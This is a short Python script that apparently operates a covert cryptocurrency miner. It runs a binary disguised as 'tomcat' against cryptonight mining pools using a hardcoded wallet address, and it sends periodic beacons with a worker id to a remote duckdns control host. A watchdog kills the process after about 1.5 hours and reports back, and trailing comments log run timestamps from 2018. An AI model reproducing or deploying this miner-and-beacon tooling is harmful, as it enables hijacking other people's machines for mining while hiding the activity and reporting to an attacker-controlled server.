import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:05.732142
#2018-02-17 16:11:03.884850
#2018-02-17 17:58:04.978016
#2018-02-17 19:45:08.838292
#2018-02-17 21:32:04.319079
#2018-02-17 23:16:06.492480
#2018-02-18 01:03:01.300121
#2018-02-18 02:51:03.599598
#2018-02-18 04:39:07.375900
#2018-02-18 06:31:05.250566
#2018-02-18 08:19:05.906613
#2018-02-18 10:07:04.927591
#2018-02-18 11:53:05.206070
#2018-02-18 13:37:05.057610
#2018-02-18 15:26:07.609391
#2018-02-18 17:15:09.121069
#2018-02-18 19:03:03.964802
#2018-02-18 20:50:05.903711
#2018-02-18 22:36:01.346562
#2018-02-19 00:24:01.313937
#2018-02-19 02:09:07.583867
#2018-02-19 03:57:05.298495
#2018-02-19 05:41:04.549065
#2018-02-19 07:29:06.308500
#2018-02-19 09:19:06.108586
#2018-02-19 11:09:01.435536
#2018-02-19 12:56:07.362045
#2018-02-19 14:45:05.951503
#2018-02-19 16:33:06.831576
#2018-02-19 18:19:07.910082
#2018-02-19 20:05:09.349057
#2018-02-19 21:56:07.730310
#2018-02-19 23:41:04.333641
#2018-02-20 01:28:07.402162
#2018-02-20 03:17:04.854440
#2018-02-20 05:04:03.924529
#2018-02-20 06:47:04.089689
#2018-02-20 08:33:07.401390
#2018-02-20 10:17:02.106724
#2018-02-20 12:02:04.668710
#2018-02-20 13:50:11.963003
#2018-02-20 15:36:01.755379
#2018-02-20 17:20:11.040389
#2018-02-20 19:10:09.807711
#2018-02-20 20:58:01.955703
#2018-02-20 22:42:04.108783
#2018-02-21 00:24:07.064796
#2018-02-21 02:09:07.119579
#2018-02-21 03:56:07.650401
#2018-02-21 05:45:10.051056
#2018-02-21 07:34:16.048480
#2018-02-21 09:19:01.256812
#2018-02-21 11:08:04.331293
#2018-02-21 12:55:12.182437
#2018-02-21 14:42:05.225257
#2018-02-21 16:29:01.753232
#2018-02-21 18:20:09.820171
#2018-02-21 20:07:01.304246
#2018-02-21 21:53:08.975931
#2018-02-21 23:42:05.214506
#2018-02-22 01:31:01.805616
#2018-02-22 03:18:07.871129
#2018-02-22 05:05:01.435530
#2018-02-22 06:47:06.364111
#2018-02-22 08:34:08.658421
#2018-02-22 10:21:07.281861
#2018-02-22 12:06:12.727309
#2018-02-22 13:51:12.268851
#2018-02-22 15:38:10.472121
#2018-02-22 17:24:08.822343
#2018-02-22 19:13:01.738564
#2018-02-22 21:04:06.032209
#2018-02-22 22:49:05.557907
#2018-02-23 00:37:06.909541
#2018-02-23 02:25:01.763050
#2018-02-23 04:16:01.629169
#2018-02-23 06:03:03.639686
#2018-02-23 07:48:04.283335
#2018-02-23 09:52:05.041512
#2018-02-23 11:58:06.711941
#2018-02-23 13:47:08.077829
#2018-02-23 15:36:07.031258
#2018-02-23 17:24:05.719560
#2018-02-23 19:11:05.161238
#2018-02-23 20:55:04.542887
#2018-02-23 22:42:03.226788
#2018-02-24 00:29:07.160980
#2018-02-24 02:19:06.532461
#2018-02-24 04:09:07.595644
#2018-02-24 05:57:06.142465
#2018-02-24 07:46:05.993343
#2018-02-24 09:29:07.105197
#2018-02-24 11:22:07.619340
#2018-02-24 13:12:02.217294
#2018-02-24 15:01:07.874591
#2018-02-24 16:51:01.409409
#2018-02-24 18:39:07.407070
#2018-02-24 20:30:03.640543
#2018-02-24 22:28:07.319908
#2018-02-25 01:38:01.348625
#2018-02-25 05:09:04.799288
#2018-02-25 10:28:02.052126